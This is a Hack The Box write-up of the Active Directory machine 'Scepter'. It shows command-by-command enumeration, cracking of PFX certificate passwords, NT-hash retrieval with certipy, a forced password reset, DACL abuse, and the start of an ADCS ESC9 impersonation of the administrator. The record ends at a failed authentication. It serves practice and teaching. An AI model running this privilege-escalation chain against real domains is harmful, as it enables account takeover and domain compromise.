HTB | Scepter
Machine - https://app.hackthebox.com/machines/Scepter
IP - 10.10.11.65
NMAP
└─$ nmap -sT -p- --min-rate 10000 10.10.11.65 -Pn -oA nmap_ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-23 18:47 IST
Warning: 10.10.11.65 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.65
Host is up (0.44s latency).
Not shown: 33674 closed tcp ports (conn-refused), 31841 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
2049/tcp open nfs
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49665/tcp open unknown
49667/tcp open unknown
49673/tcp open unknown
49696/tcp open unknown
49709/tcp open unknown
49726/tcp open unknown
49764/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 169.44 seconds└─$ nmap -sC -sV -p 53,88,111,135,139,445,464,636,2049,3269,5985,9389,49664,49665,49667,49673,49696,49709,49726,49764 10.10.11.65 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-23 18:51 IST
Nmap scan report for 10.10.11.65
Host is up (0.63s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-23 21:24:31Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
|_ssl-date: 2025-06-23T21:25:51+00:00; +8h02m51s from scanner time.
2049/tcp open nlockmgr 1-4 (RPC #100021)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
|_ssl-date: 2025-06-23T21:25:52+00:00; +8h02m52s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
49726/tcp open msrpc Microsoft Windows RPC
49764/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-06-23T21:25:40
|_ start_date: N/A
|_clock-skew: mean: 8h02m51s, deviation: 0s, median: 8h02m50s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 464.81 secondsPort 2049
Let’s see the mount
└─$ showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)We can see the helpdesk mount and everyone have the permission to view it
Foothold/shell
Shell as H.Brown
helpdesk mount
Let's mount the helpdesk share and take a look inside.
└─$ sudo mount -t nfs 10.10.11.65:/helpdesk /mnt/ We can see .crt and .key for baker and .pfx file for clark, lewis and scott
└─$ sudo ls /mnt
baker.crt baker.key clark.pfx lewis.pfx scott.pfxLet’s view the certificate of baker
└─# openssl x509 -in baker.crt -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
62:00:00:00:32:e1:a5:c3:91:51:31:09:7b:00:00:00:00:00:32
Signature Algorithm: sha256WithRSAEncryption
Issuer: DC=htb, DC=scepter, CN=scepter-DC01-CA
Validity
Not Before: Nov 2 01:13:46 2024 GMT
Not After : Nov 2 01:13:46 2025 GMT
Subject: DC=htb, DC=scepter, CN=Users, CN=d.baker, emailAddress=d.baker@scepter.htb
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:a5:83:8f:1c:7b:70:f0:2b:08:21:2e:a6:16:4a:
08:f0:2b:43:e4:8e:13:bb:7e:89:0d:23:9b:76:76:
19:91:9d:5e:29:6f:d5:89:fd:6b:5c:bf:4b:1f:29:
0a:84:96:d3:1a:e2:6c:10:34:87:2a:de:e6:62:cd:
2b:e3:d2:54:dc:7a:d6:d9:92:28:b2:e2:21:4a:ad:
b9:81:ca:a5:ef:7b:67:23:b4:68:09:cf:27:eb:35:
19:05:06:a2:10:96:db:5c:08:5c:28:9d:53:91:aa:
dc:dd:95:f7:53:d6:87:a0:a9:24:94:c2:61:c8:7d:
35:0f:fd:f1:bc:6b:0c:e9:76:c2:14:76:f2:dc:79:
a7:c2:8b:8a:a6:1f:7f:6b:b7:b6:5c:fc:a7:1e:76:
2f:c1:b5:37:3c:e9:09:3e:6f:8f:e3:92:a8:e6:bd:
7c:56:e1:0b:74:72:41:18:e5:71:f7:f6:8e:c6:a4:
3d:c1:4d:51:aa:2e:0e:ef:5d:5d:58:07:a7:af:cc:
1f:1b:42:14:20:49:b6:86:63:ca:01:f0:09:c3:e7:
4a:82:9b:29:7b:d4:ed:51:99:49:b3:43:38:64:b6:
bf:c5:d8:5d:c9:29:ab:f6:c9:eb:ca:2a:e0:49:80:
fd:28:4c:d6:c7:ed:0d:b2:a6:87:7e:63:35:6a:ab:
19:13
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Subject Key Identifier:
37:94:CC:57:E3:A4:CB:55:63:1A:47:8F:83:D0:6E:50:C2:34:63:51
X509v3 Authority Key Identifier:
EB:90:54:38:D2:A6:6C:89:6A:CB:6D:4D:A4:BA:75:15:60:15:27:E3
X509v3 CRL Distribution Points:
Full Name:
URI:ldap:///CN=scepter-DC01-CA,CN=dc01,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=scepter,DC=htb?certificateRevocationList?base?objectClass=cRLDistributionPoint
Authority Information Access:
CA Issuers - URI:ldap:///CN=scepter-DC01-CA,CN=AIA,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=scepter,DC=htb?cACertificate?base?objectClass=certificationAuthority
1.3.6.1.4.1.311.20.2:
...U.s.e.r
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
Microsoft Encrypted File System, E-mail Protection, TLS Web Client Authentication
X509v3 Subject Alternative Name:
othername: UPN:d.baker@scepter.htb, email:d.baker@scepter.htb
Microsoft NTDS CA Extension:
0<.:.
+.....7....,.*S-1-5-21-74879546-916818434-740295365-1106
S/MIME Capabilities:
......0...+....0050...*.H..
..*.H..
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
55:98:3d:9f:d8:f2:64:ac:a3:7c:e2:d6:ab:fb:26:cf:97:89:
dd:1b:67:a4:81:de:35:11:be:d4:04:97:c0:a0:a9:da:33:2a:
ea:ca:f3:dc:6d:34:f3:57:45:47:1a:e0:00:0d:bd:43:80:a5:
a4:40:30:dd:cb:fd:df:b5:ea:6c:f1:7b:d0:c4:0d:6b:c1:51:
de:eb:55:12:2b:48:bf:3c:eb:01:ab:c3:e6:08:25:01:8c:c4:
1e:88:2a:71:c6:6e:ee:2d:da:04:14:38:c4:20:b9:fb:17:db:
a2:94:f6:ac:4c:e9:60:ba:54:7b:a7:61:a3:9e:fb:14:be:01:
33:04:32:56:3a:1c:27:8d:99:f8:40:fa:8b:c7:da:24:69:5d:
6b:6e:0c:a1:12:8c:72:46:e5:92:77:a5:8a:38:7d:3e:3b:6b:
60:ed:01:ce:31:68:df:34:10:26:87:9b:0b:5a:aa:b3:2b:22:
2f:ad:8f:c0:17:2c:0a:da:0d:52:6d:95:31:4d:6f:cd:3e:b7:
77:c5:f8:5b:6d:2f:6f:87:8d:c1:bc:3a:9d:6c:a7:02:a4:14:
b9:6c:4f:7e:d0:88:57:4e:b5:ad:97:fd:5d:6b:a0:24:aa:d7:
f1:31:84:81:d6:af:9b:b6:b6:44:31:27:17:26:47:c9:9b:6c:
cf:b4:b5:6a
-----BEGIN CERTIFICATE-----
MIIGTDCCBTSgAwIBAgITYgAAADLhpcORUTEJewAAAAAAMjANBgkqhkiG9w0BAQsF
ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHc2NlcHRl
cjEYMBYGA1UEAxMPc2NlcHRlci1EQzAxLUNBMB4XDTI0MTEwMjAxMTM0NloXDTI1
MTEwMjAxMTM0NlowdDETMBEGCgmSJomT8ixkARkWA2h0YjEXMBUGCgmSJomT8ixk
ARkWB3NjZXB0ZXIxDjAMBgNVBAMTBVVzZXJzMRAwDgYDVQQDEwdkLmJha2VyMSIw
IAYJKoZIhvcNAQkBFhNkLmJha2VyQHNjZXB0ZXIuaHRiMIIBIjANBgkqhkiG9w0B
AQEFAAOCAQ8AMIIBCgKCAQEApYOPHHtw8CsIIS6mFkoI8CtD5I4Tu36JDSObdnYZ
kZ1eKW/Vif1rXL9LHykKhJbTGuJsEDSHKt7mYs0r49JU3HrW2ZIosuIhSq25gcql
73tnI7RoCc8n6zUZBQaiEJbbXAhcKJ1Tkarc3ZX3U9aHoKkklMJhyH01D/3xvGsM
6XbCFHby3HmnwouKph9/a7e2XPynHnYvwbU3POkJPm+P45Ko5r18VuELdHJBGOVx
9/aOxqQ9wU1Rqi4O711dWAenr8wfG0IUIEm2hmPKAfAJw+dKgpspe9TtUZlJs0M4
ZLa/xdhdySmr9snryirgSYD9KEzWx+0NsqaHfmM1aqsZEwIDAQABo4IDATCCAv0w
HQYDVR0OBBYEFDeUzFfjpMtVYxpHj4PQblDCNGNRMB8GA1UdIwQYMBaAFOuQVDjS
pmyJasttTaS6dRVgFSfjMIHKBgNVHR8EgcIwgb8wgbyggbmggbaGgbNsZGFwOi8v
L0NOPXNjZXB0ZXItREMwMS1DQSxDTj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBL
ZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPXNj
ZXB0ZXIsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmpl
Y3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEw
ga4GCCsGAQUFBzAChoGhbGRhcDovLy9DTj1zY2VwdGVyLURDMDEtQ0EsQ049QUlB
LENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZp
Z3VyYXRpb24sREM9c2NlcHRlcixEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29i
amVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwFwYJKwYBBAGCNxQCBAoe
CABVAHMAZQByMA4GA1UdDwEB/wQEAwIFoDApBgNVHSUEIjAgBgorBgEEAYI3CgME
BggrBgEFBQcDBAYIKwYBBQUHAwIwQwYDVR0RBDwwOqAjBgorBgEEAYI3FAIDoBUM
E2QuYmFrZXJAc2NlcHRlci5odGKBE2QuYmFrZXJAc2NlcHRlci5odGIwSwYJKwYB
BAGCNxkCBD4wPKA6BgorBgEEAYI3GQIBoCwEKlMtMS01LTIxLTc0ODc5NTQ2LTkx
NjgxODQzNC03NDAyOTUzNjUtMTEwNjBEBgkqhkiG9w0BCQ8ENzA1MA4GCCqGSIb3
DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYFKw4DAgcwCgYIKoZIhvcNAwcwDQYJ
KoZIhvcNAQELBQADggEBAFWYPZ/Y8mSso3zi1qv7Js+Xid0bZ6SB3jURvtQEl8Cg
qdozKurK89xtNPNXRUca4AANvUOApaRAMN3L/d+16mzxe9DEDWvBUd7rVRIrSL88
6wGrw+YIJQGMxB6IKnHGbu4t2gQUOMQgufsX26KU9qxM6WC6VHunYaOe+xS+ATME
MlY6HCeNmfhA+ovH2iRpXWtuDKESjHJG5ZJ3pYo4fT47a2DtAc4xaN80ECaHmwta
qrMrIi+tj8AXLAraDVJtlTFNb80+t3fF+FttL2+HjcG8Op1spwKkFLlsT37QiFdO
ta2X/V1roCSq1/ExhIHWr5u2tkQxJxcmR8mbbM+0tWo=
-----END CERTIFICATE-----Let’s take a look at the key
└─# cat baker.key
Bag Attributes
friendlyName:
localKeyID: DC 2B 20 65 C3 0D 91 40 E8 37 B5 CC 06 0F EA 66 5D 3B 7C 4E
Key Attributes: <No Attributes>
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIIFNTBfBgkqhkiG9w0BBQ0wUjAxBgkqhkiG9w0BBQwwJAQQ17OfpdLR0GFTqV4d
KoDehgICCAAwDAYIKoZIhvcNAgkFADAdBglghkgBZQMEASoEEEcu2qznlHlXQqAg
xOEmzdQEggTQHj6+lbqr5wQXN8Oqxe57h5vuA8ihIcIte/gpDRNnIzvLDvmQ3gSr
JE51d0E4VhzxcSYH43m3X64GQ8mkESOuoKh5JhwX5+vWHvbKM18komfpX4MHhe0J
wblo8Dhc3j2BSuhRoYpG9mJwSdATYFwxlYnWF5499bDHGkPnOPkR08C/FRyW1QhJ
qyMGNLnJ9IxlWySY+Fm/0RQOyu4hS0u87OLoglW9OIhDfu6rz0QdDWIs+1dQxrwE
a6OBdL+q38NSK6H2cBopCYTtyGw/Okzl5+Lrn411a2HdpT8JjXinTNZMtn9hww6U
MqqMUYzXG6zfBQ/vSoutIW0/Wkg5b4BVK/wW/EFh6vcBlWVk0CdXz8kScsWx7KF4
4yqKTN/aWGfvYx2DWW17cGzUsOvAmW1OXgu2YBYVAjs6vbXYzJyqzTKIlsSKmnP+
wzaoxgAsT/QtEAHppMDIW0jEDpYDcRvRi5//Ejpdbz3XETvEXFj1OEpWVwWTxZSM
tiEjCRJU/btiRsXoB1p1mvHEA1RyO+XX93yX5WRbFUB+5t9t8XrVCsUt1JfFNdVa
mC4BhzAInFgut74NiIQ7vbe3OlNsse0ZWtfwof4mzb4U1e7dCffD0IoKXLxZhszd
Cave8eNaHYi6N7wO5ActNp5HhQFhtogTSe99NHnE41zRHTcejsFsUQS/mpzubUXj
aGkTt5uPRJXuw5+jcxpZOvXKb6qDdJUSCa/Od4fGgmQGtaKBr/XIciQg/K96CBUH
ayp6WcBcAwtTZeUQJM/V/qheHtipsJjuJzeBi35IitpafblcrKMSmtIKE972b5fD
X0NdnDCSrNZeTXNYC4BN2+t4h1QP1heWU2jfzNLAcDoD+aUrpW/JCEGwMzOe6MTC
c/h3NCYOcPvcc3L20wXOtYOjp6gzDdp2JliW+n6QUxm7fJo/AUtGGSknziZ3VbMc
fqC4vbPy88d2fHt9QWmIOmjpMpwZObotA8rMpg41FxsXQq9mqZy08tppF6T0DdwY
A8soic4SbMpUAuuAz9WJRwKtHwlGoJNtBrLfrVKsUnO/FGZpDOYyIRCBMlMyI6u2
LPLVkRIJx+tajQhkzhfTmdx6CQUmeaJU2wL92fY1jqTeRcm2T70TVHKZk2spcaGp
lVcRgWdFAz52JHNCfVjCfJ6dRbVPxbSC2vHN/YJa8LcQA0RGgKxoh1sRC/3HHFQz
wtJ/xnp/dk4YsntrUOgr8/mcjYqQh7WqRzHFYG/VE2Ipy3XT6iONi23ggiAWP9KV
e0cRcPSwjN4FzQH+fX3rf1x8YcQI9UricqxI2IM3Q9dDkZhMz4yjStO2XGpOo5od
AiOTySb9tflvKZOggXKZE1Eo7lHpWYfKt7baQlUEFb2RslA0JjBtJ8fdJqdHW1+8
3o8QN4AJtYqNDB6dHaxMmwG7L1WnCMofbGDxlK+bdsgr3BapXt0n6+JXA6iS7i8J
wYTlDp5UYXTT87fUGejNBXhCsJODZJGQxVjxl5JMhmaLbvFNW0YDAZe8WnX7LsYp
7X+ajbc3hOSIIU1JOufrGWQxVvkoFdXcRBG9L15Uwsrpfzr2CA5J3kRMBxuZQnjJ
90yWTwKFUUj3pzCG2WyraNJn44jo3sFJzoUhyUKUYfn2lMtnwOvw//A=
-----END ENCRYPTED PRIVATE KEY-----
attempting to authenticate via pfx
Since we have Clark, Lewis and Scott PFX files, we can try to authenticate
First, convert them into hash and use John to crack them
└─$ pfx2john lewis.pfx | tee -a lewishash
└─$ pfx2john clark.pfx | tee -a clarkhash
└─$ pfx2john scott.pfx| tee -a scotthash
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ john lewishash --wordlist=/home/anurag/stuff/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
newpassword (lewis.pfx)
1g 0:00:00:00 DONE (2025-06-23 19:45) 2.173g/s 11686p/s 11686c/s 11686C/s Liverpool..ginuwine
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ john clarkhash --wordlist=/home/anurag/stuff/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
newpassword (clark.pfx)
1g 0:00:00:00 DONE (2025-06-23 19:45) 2.500g/s 13440p/s 13440c/s 13440C/s Liverpool..ginuwine
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ john scotthash --wordlist=/home/anurag/stuff/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
newpassword (scott.pfx)
1g 0:00:00:00 DONE (2025-06-23 19:46) 1.923g/s 10338p/s 10338c/s 10338C/s Liverpool..ginuwine
Use the "--show" option to display all of the cracked passwords reliably
Session completed. I was not able to authenticate via Clark, Lewis and Scott PFX files
Let’s make PFX for baker
PFX for baker
When prompted for passphrase, we can provide the password of clark, lewos and scott pfx and when prompt for export password let’s keep it empty
└─$ openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt
Enter pass phrase for baker.key:
Enter Export Password:
Verifying - Enter Export Password:Let’s change the permission for pfx
chmod 700 baker.pfxNow we can use certipy to get the hash from the pfx
└─$ certipy auth -pfx baker.pfx -dc-ip 10.10.11.65
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'd.baker@scepter.htb'
[*] Security Extension SID: 'S-1-5-21-74879546-916818434-740295365-1106'
[*] Using principal: 'd.baker@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'd.baker.ccache'
[*] Wrote credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ceWe can successfully authenticate via this hash
└─$ netexec ldap 10.10.11.65 -u d.baker -H 18b5fb0d99e7a475316213c15b6f22ce
LDAP 10.10.11.65 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:scepter.htb)
LDAP 10.10.11.65 389 DC01 [+] scepter.htb\d.baker:18b5fb0d99e7a475316213c15b6f22ce Bloodhound
Since we authenticate as ldap we can use bloodhound-python
└─$ bloodhound-python -u 'd.baker' --hashes :18b5fb0d99e7a475316213c15b6f22ce -d Scepter.htb -ns 10.10.11.65 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 01M 22S
INFO: Compressing output into 20250624042828_bloodhound.zip
We can see D.BAKER@SCEPTER.HTB -> ForceChangePassword -> A.CATER@SCEPTOR.HTB
ForceChangePassword
We will change the password for a.carter
└─$ bloodyAD --host 10.10.11.65 -d scepter.htb -u d.baker -p :18b5fb0d99e7a475316213c15b6f22ce set password a.carter 'P@ssw0rd@123'
[+] Password changed successfully!└─$ netexec smb 10.10.11.65 -u a.carter -p 'P@ssw0rd@123'
SMB 10.10.11.65 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:scepter.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.65 445 DC01 [+] scepter.htb\a.carter:P@ssw0rd@123 Bloodhound again with new cred
GenericALL
We can see A.CARTER@SCEPTER.HTB -> MemberOf -> IT SUPPORT@SCEPTER.HTB -> GenericAll -> STAFF ACCESS CERTIFICATE@SCEPTER.HTB
grant a.carter full control (GenericAll) over the Organizational Unit (OU) called STAFF ACCESS CERTIFICATE By giving a.carter GenericAll on that OU:
You gain the ability to abuse ADCS (Active Directory Certificate Services).
You can impersonate users via certificates.
A Staff Access Certificate, in the context of AD CS, is a certificate issued to individual staff members to grant them access to specific resources or applications within the organization's network. These certificates are typically used for authentication purposes, allowing staff to prove their identity and gain access to authorized areas.
└─$ bloodyAD --host 10.10.11.65 -d scepter.htb -u a.carter -p 'P@ssw0rd@123' add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTBESC9
I try to find ADCS vulnerability so I tried with .carter and d.baker, both we found ESC9 from Baker’s cred
└─$ certipy find -u d.baker -hashes :18b5fb0d99e7a475316213c15b6f22ce -target 10.10.11.65 -text -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 20 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'scepter-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'scepter-DC01-CA'
[*] Checking web enrollment for CA 'scepter-DC01-CA' @ 'dc01.scepter.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : scepter-DC01-CA
DNS Name : dc01.scepter.htb
Certificate Subject : CN=scepter-DC01-CA, DC=scepter, DC=htb
Certificate Serial Number : 716BFFE1BE1CD1A24010F3AD0E350340
Certificate Validity Start : 2024-10-31 22:24:19+00:00
Certificate Validity End : 2061-10-31 22:34:19+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SCEPTER.HTB\Administrators
Access Rights
ManageCa : SCEPTER.HTB\Administrators
SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Enterprise Admins
ManageCertificates : SCEPTER.HTB\Administrators
SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Enterprise Admins
Enroll : SCEPTER.HTB\Authenticated Users
Certificate Templates
0
Template Name : StaffAccessCertificate
Display Name : StaffAccessCertificate
Certificate Authorities : scepter-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireEmail
SubjectRequireDnsAsCn
SubjectRequireEmail
Enrollment Flag : AutoEnrollment
NoSecurityExtension
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-01T02:29:00+00:00
Template Last Modified : 2024-11-01T09:00:54+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SCEPTER.HTB\staff
Object Control Permissions
Owner : SCEPTER.HTB\Enterprise Admins
Full Control Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
Write Owner Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
Write Dacl Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
[+] User Enrollable Principals : SCEPTER.HTB\staff
[!] Vulnerabilities
ESC9 : Template has no security extension.
[*] Remarks
ESC9 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
and we have GenericAll on StaffAccessCertificate, also, we can see
Certificate Name Flag : SubjectAltRequireEmail
Since a.carter have GenericAll on STAFF ACCESS CERTIFICATE@SCEPTER.HTB and we want d.baker to have that access we can use impacket-dacledit with -inheritance to get FullControl over d.baker, who is also a member of STAFF ACCESS CERTIFICATE OU
└─$ impacket-dacledit -action write -rights FullControl -principal a.carter -target-dn 'OU=Staff Access Certificate,DC=scepter,DC=htb' -dc-ip 10.10.11.65 specter.htb/a.carter:'P@ssw0rd@123' -inheritance
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20250624-195325.bak
[*] DACL modified successfully!Feature
bloodyAD GenericAll
impacket-dacledit with -inheritance
Affects Only Target Object
✅ Yes
✅ Yes
Affects Child Objects
❌ No
✅ Yes (if -inheritance used and not blocked)
Grants Access Type
GenericAll (standard right)
Custom ACL entry (FullControl, but customizable)
Method Used
Direct AD right via DACL
Explicit ACL modification via DACL
AdminCount Bypass Warning
❌ No warning
⚠️ Warns about adminCount=1 (inhibits inheritance)
Now we need to set the email of controlled account to that of target
Let’s try for administrator
dn: CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb
changetype: modify
replace: mail
mail: administrator@scepter.htb
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ ldapmodify -x -H ldap://10.10.11.65 -D 'scepter\a.carter' -w 'P@ssw0rd@123' -f administrator_mail.ldif
modifying entry "CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb"now we can request the pfx
─$ certipy req -username d.baker@scepter.htb -hashes :18b5fb0d99e7a475316213c15b6f22ce -ca scepter-DC01-CA -template StaffAccessCertificate
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The resolution lifetime expired after 5.401 seconds: Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 2
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'd.baker.pfx'
[*] Wrote certificate and private key to 'd.baker.pfx'
But when I try to get the hash, it says Name mismatch between certificate and user 'administrator', which was strange
─$ certipy auth -pfx d.baker.pfx -domain scepter.htb -username Administrator -dc-ip '10.10.11.65'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'administrator@scepter.htb'
